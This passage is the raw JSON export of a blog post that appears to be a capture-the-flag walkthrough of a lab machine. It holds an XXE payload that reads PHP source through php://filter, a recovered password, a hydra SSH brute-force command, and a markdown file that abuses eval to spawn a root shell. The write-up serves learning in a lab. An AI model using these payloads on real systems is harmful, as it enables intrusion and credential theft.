Time\nSynchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:106::\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:104:110::\/home\/syslog:\/usr\/sbin\/nologin\n_apt:x:105:65534::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:111:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nuuidd:x:107:112::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:108:113::\/nonexistent:\/usr\/sbin\/nologin\nlandscape:x:109:115::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:110:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:111:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\ndevelopment:x:1000:1000:Development:\/home\/development:\/bin\/bash\nlxd:x:998:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nusbmux:x:112:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin<\/textarea><\/div><div class=\"fusion-text fusion-text-15\" style=\"margin-top:10px;\"><p>As we are trying to retrieve <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">php<\/span> source we can use a trick ( <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">php:\/\/filter\/convert.base64-encode\/resource=<\/span> ) to get the source code without it executing on the server, but it does come back as Base64 and needs to be decoded.<br \/>\nCleartext payload:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-6 > .CodeMirror, .fusion-syntax-highlighter-6 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-6 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-6 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-6 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_6\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_6\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/html\">data=<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n\t<!ELEMENT foo ANY >\n\t<!ENTITY file SYSTEM \"php:\/\/filter\/convert.base64-encode\/resource=\/var\/www\/html\/db.php\" >]>\n\t<bugreport>\n\t\t<title>`&file;`<\/title>\n\t\t<cwe><\/cwe>\n\t\t<cvss><\/cvss>\n\t\t<reward><\/reward>\n\t<\/bugreport><\/textarea><\/div><div class=\"fusion-text fusion-text-16\" style=\"margin-top:10px;\"><p>Base64 Encoded:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-7 > .CodeMirror, .fusion-syntax-highlighter-7 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-7 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-7 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-7 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_7\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_7\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/html\">data=PD94bWwgIHZlcnNpb249IjEuMCI\/Pg0KPCFET0NUWVBFIGZvbyBbDQogICA8IUVMRU1FTlQgZm9vIEFOWSA+DQogICA8IUVOVElUWSBmaWxlIFNZU1RFTSAicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vdmFyL3d3dy9odG1sL2RiLnBocCIgPl0+DQogICAgICAgIDxidWdyZXBvcnQ+DQogICAgICAgIDx0aXRsZT5gJmZpbGU7YDwvdGl0bGU+DQogICAgICAgIDxjd2U+PC9jd2U+DQogICAgICAgIDxjdnNzPjwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD48L3Jld2FyZD4NCiAgICAgICAgPC9idWdyZXBvcnQ+<\/textarea><\/div><div class=\"fusion-text fusion-text-17\" style=\"margin-top:10px;\"><p>URL Encoded:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-8 > .CodeMirror, .fusion-syntax-highlighter-8 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-8 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-8 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-8 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_8\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_8\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/html\">data=PD94bWwgIHZlcnNpb249IjEuMCI\/Pg0KPCFET0NUWVBFIGZvbyBbDQogICA8IUVMRU1FTlQgZm9vIEFOWSA%2bDQogICA8IUVOVElUWSBmaWxlIFNZU1RFTSAicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vdmFyL3d3dy9odG1sL2RiLnBocCIgPl0%2bDQogICAgICAgIDxidWdyZXBvcnQ%2bDQogICAgICAgIDx0aXRsZT5gJmZpbGU7YDwvdGl0bGU%2bDQogICAgICAgIDxjd2U%2bPC9jd2U%2bDQogICAgICAgIDxjdnNzPjwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD48L3Jld2FyZD4NCiAgICAgICAgPC9idWdyZXBvcnQ%2b<\/textarea><\/div><div class=\"fusion-text fusion-text-18\" style=\"margin-top:10px;\"><p>Provides:<\/p>\n<\/div><div style=\"text-align:center;\"><style>.fusion-imageframe.imageframe-9{ margin-bottom : 10px;}<\/style><span class=\" fusion-imageframe imageframe-none imageframe-9 hover-type-none\"><img decoding=\"async\" width=\"1024\" height=\"208\" title=\"8\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8-1024x208.png\" alt class=\"lazyload img-responsive wp-image-427\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%271133%27%20height%3D%27230%27%20viewBox%3D%270%200%201133%20230%27%3E%3Crect%20width%3D%271133%27%20height%3D%27230%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8-200x41.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8-400x81.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8-600x122.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8-800x162.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8.png 1133w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 1024px\" \/><\/span><\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-9 > .CodeMirror, .fusion-syntax-highlighter-9 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-9 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-9 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-9 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:15px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_9\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_9\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/txt\">If DB were ready, would have added:\n\tTitle: `PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo\/Pgo=`\n\tCWE:\n\tScore:\n\tReward:<\/textarea><\/div><div class=\"fusion-text fusion-text-19\" style=\"margin-top:10px;\"><p>When we decode the string <style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-10 > .CodeMirror, .fusion-syntax-highlighter-10 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-10 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-10 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-10 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_10\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_10\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/x-sh\">PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo\/Pgo=<\/textarea><\/div> from base64 we are presented with the database credentials:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-11 > .CodeMirror, .fusion-syntax-highlighter-11 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-11 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-11 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-11 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_11\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_11\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/x-php\"><?php\n\t\/\/ TODO -> Implement login system with the database.\n\t$dbserver = \"localhost\";\n\t$dbname = \"bounty\";\n\t$dbusername = \"admin\";\n\t$dbpassword = \"m19RoAU0hP41A1sTsq6K\";\n\t$testuser = \"test\";\n?><\/textarea><\/div><div class=\"fusion-text fusion-text-20\" style=\"margin-top:10px;\"><p>Now we have two things, <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">usernames<\/span> and <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">credentials<\/span>, lets push on port 22 with a bruteforce login attempt to see if these creds work for any of our enumerated users. I pasted the contents of the recovered <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">\/etc\/passwd<\/span> file into a file named <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">etc_passwd<\/span> on my machine and extracted the users with the command <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">cat etc_passwd | cut -f 1 -d \u201c:\u201d &gt; users.txt<\/span> which quickly provides a nice list:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-12 > .CodeMirror, .fusion-syntax-highlighter-12 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-12 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-12 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-12 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_12\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_12\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/x-sh\">root\ndaemon\nbin\nsys\nsync\ngames\nman\nlp\nmail\nnews\nuucp\nproxy\nwww-data\nbackup\nlist\nirc\ngnats\nnobody\nsystemd-network\nsystemd-resolve\nsystemd-timesync\nmessagebus\nsyslog\n_apt\ntss\nuuidd\ntcpdumplandscape\npollinate\nsshd\nsystemd-coredump\ndevelopment\nlxd\nusbmux<\/textarea><\/div><div class=\"fusion-text fusion-text-21\" style=\"margin-top:10px;\"><p>Using Hydra we can attempt to brute force the logins using:<br \/>\nCommand: <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">hydra -L users.txt -p \u2018m19RoAU0hP41A1sTsq6K\u2019 10.129.193.21 ssh<\/span><\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-10 hover-type-none\"><img decoding=\"async\" width=\"951\" height=\"246\" title=\"9\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9.png\" alt class=\"lazyload img-responsive wp-image-431\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27951%27%20height%3D%27246%27%20viewBox%3D%270%200%20951%20246%27%3E%3Crect%20width%3D%27951%27%20height%3D%27246%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9-200x52.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9-400x103.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9-600x155.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9-800x207.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9.png 951w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 951px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-22\" style=\"margin-top:10px;\"><p>We found creds: <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">development:m19RoAU0hP41A1sTsq6K<\/span><\/p>\n<\/div><div class=\"fusion-separator fusion-full-width-sep\" style=\"align-self: center;margin-left: auto;margin-right: auto;width:100%;\"><div class=\"fusion-separator-border sep-single sep-dashed\" style=\"border-color:#f4ad24;border-top-width:1px;\"><\/div><\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-4{margin-top:10px!important; margin-right:0px!important;margin-bottom:31px!important;margin-left:0px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-4{margin-top:0px!important; margin-right:0px!important;margin-bottom:20px!important; margin-left:0px!important;}}<\/style><div class=\"fusion-title title fusion-title-4 fusion-title-text fusion-title-size-four\" style=\"margin-top:10px;margin-right:0px;margin-bottom:31px;margin-left:0px;\"><div class=\"title-sep-container title-sep-container-left fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><span class=\"awb-title-spacer fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><\/span><h4 class=\"title-heading-left fusion-responsive-typography-calculated\" style=\"margin:0;--fontSize:18;--minFontSize:18px;line-height:1.5;\">ROOT<\/h4><span class=\"awb-title-spacer\"><\/span><div class=\"title-sep-container title-sep-container-right\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div><div class=\"fusion-text fusion-text-23\"><p>Always check for the low hanging fruit first, here we run <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">sudo -l <\/span>to list the commands our <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">development<\/span> user can run with privileges and are presented with the following:<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-11 hover-type-none\"><img decoding=\"async\" width=\"955\" height=\"138\" title=\"10\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10.png\" alt class=\"lazyload img-responsive wp-image-432\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27955%27%20height%3D%27138%27%20viewBox%3D%270%200%20955%20138%27%3E%3Crect%20width%3D%27955%27%20height%3D%27138%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10-200x29.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10-400x58.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10-600x87.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10-800x116.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10.png 955w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 955px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-24\" style=\"margin-top:10px;\"><p>Having a look at the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">ticketValidator.py<\/span> script:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-13 > .CodeMirror, .fusion-syntax-highlighter-13 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-13 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-13 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-13 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_13\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_13\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/javascript\">#Skytrain Inc Ticket Validation System 0.1\n#Do not distribute this file.\n\ndef load_file(loc):\n    if loc.endswith(\".md\"): # checks to make sure the filename ends with .md otherwise, exit\n        return open(loc, 'r')\n    else:\n        print(\"Wrong file type.\")\n        exit()\n\ndef evaluate(ticketFile):\n    #Evaluates a ticket to check for ireggularities.\n    code_line = None\n    for i,x in enumerate(ticketFile.readlines()):\n        if i == 0:\n            if not x.startswith(\"# Skytrain Inc\"): # .md file must start with this string\n                return False\n            continue\n        if i == 1:\n            if not x.startswith(\"## Ticket to \"): # second line must start with this string\n                return False\n            print(f\"Destination: {' '.join(x.strip().split(' ')[3:])}\") # strips beginning and end spaces then splits the string at spaces and adds the destination provided after the third space\n            continue\n\n        if x.startswith(\"__Ticket Code:__\"): # Third line must start with this string\n            code_line = i+1\n            continue\n\n        if code_line and i == code_line:\n            if not x.startswith(\"**\"): # Fourth line must start with **\n                return False\n            ticketCode = x.replace(\"**\", \"\").split(\"+\")[0] # Strips '**' splits on the first + symbol and assigns sting \/ integers at position 0 to the ticketCode' variable\n            if int(ticketCode) % 7 == 4: # checks that the variable ticketcode (has to be greater than 100) modulo 7 is equal to 4 (this could be 102, 109 etc.)\n                validationNumber = eval(x.replace(\"**\", \"\")) # runs an eval on the provided string (this is where we can inject our code to get root)\n                if validationNumber > 100:\n                    return True\n                else:\n                    return False\n    return False\n\ndef main():\n    fileName = input(\"Please enter the path to the ticket file.\\n\")\n    ticket = load_file(fileName)\n    #DEBUG print(ticket)\n    result = evaluate(ticket)\n    if (result):\n        print(\"Valid ticket.\")\n    else:\n        print(\"Invalid ticket.\")\n    ticket.close\n\nmain()<\/textarea><\/div><div class=\"fusion-text fusion-text-25\" style=\"margin-top:10px;\"><p>Lets create the markdown file to exploit root:<span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">apple.md<\/span><\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-14 > .CodeMirror, .fusion-syntax-highlighter-14 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-14 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-14 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-14 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_14\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_14\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/md\"># Skytrain Inc\n## Ticket to root\n__Ticket Code:__\n**109+ 0 and __import__('os').system('\/bin\/bash')\n##Issued: 2021\/06\/21\n#End Ticket<\/textarea><\/div><div class=\"fusion-text fusion-text-26\" style=\"margin-top:10px;\"><p>The <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">apple.md<\/span> file spawns a new root bash shell.<\/p>\n<\/div><div style=\"text-align:center;\"><style>.fusion-imageframe.imageframe-12{ margin-bottom : 10px;}<\/style><span class=\" fusion-imageframe imageframe-none imageframe-12 hover-type-none\"><img decoding=\"async\" width=\"842\" height=\"141\" title=\"11\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11.png\" alt class=\"lazyload img-responsive wp-image-433\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27842%27%20height%3D%27141%27%20viewBox%3D%270%200%20842%20141%27%3E%3Crect%20width%3D%27842%27%20height%3D%27141%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11-200x33.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11-400x67.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11-600x100.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11-800x134.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11.png 842w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 842px\" \/><\/span><\/div><div class=\"fusion-separator fusion-full-width-sep\" style=\"align-self: center;margin-left: auto;margin-right: auto;width:100%;\"><div class=\"fusion-separator-border sep-single sep-dashed\" style=\"border-color:#f4ad24;border-top-width:1px;\"><\/div><\/div><div class=\"fusion-text fusion-text-27\" style=\"margin-top:10px;\"><p><strong>Happy Hacking Folks!<\/strong><br \/>\n<em>Cheerz<\/em><\/p>\n<\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-0{width:80% !important;margin-top : 0px;margin-bottom : 20px;}.fusion-builder-column-0 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 2.4%;padding-bottom : 0px !important;padding-left : 5% !important;margin-left : 2.4%;}@media only screen and (max-width:1024px) {.fusion-body .fusion-builder-column-0{width:100% !important;order : 0;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-0{width:100% !important;order : 0;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-flex-container.fusion-builder-row-1{ padding-top : 0px;margin-top : 0px;padding-right : 30px;padding-bottom : 0px;margin-bottom : 0px;padding-left : 30px;}<\/style><\/div>\n\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":378,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14],"tags":[15],"acf":[],"_links":{"self":[{"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/posts\/533"}],"collection":[{"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/comments?post=533"}],"version-history":[{"count":2,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/posts\/533\/revisions"}],"predecessor-version":[{"id":535,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/posts\/533\/revisions\/535"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/media\/378"}],"wp:attachm